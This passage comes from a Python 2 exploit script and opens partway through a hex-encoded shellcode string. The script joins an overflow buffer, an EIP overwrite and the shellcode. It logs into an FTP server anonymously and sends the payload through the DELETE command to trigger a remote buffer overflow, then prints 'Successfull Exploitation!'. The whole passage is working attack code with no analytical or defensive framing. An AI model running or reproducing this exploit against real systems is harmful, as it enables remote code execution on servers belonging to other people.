+"\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" + +"\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" + +"\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" + +"\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" + +"\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" + +"\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" + +"\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" + +"\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" + +"\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" + +"\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" + +"\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" + +"\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" + +"\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" + +"\xa5\x59\x50") +remotecode = overflow + eip + shellcode +ftp = FTP(ftp_ip) +ftp.login('anonymous', 'hacker@hacker.net') +print ftp.login +print ''' +Successfull Exploitation! +''' +FTP.delete(ftp, remotecode) +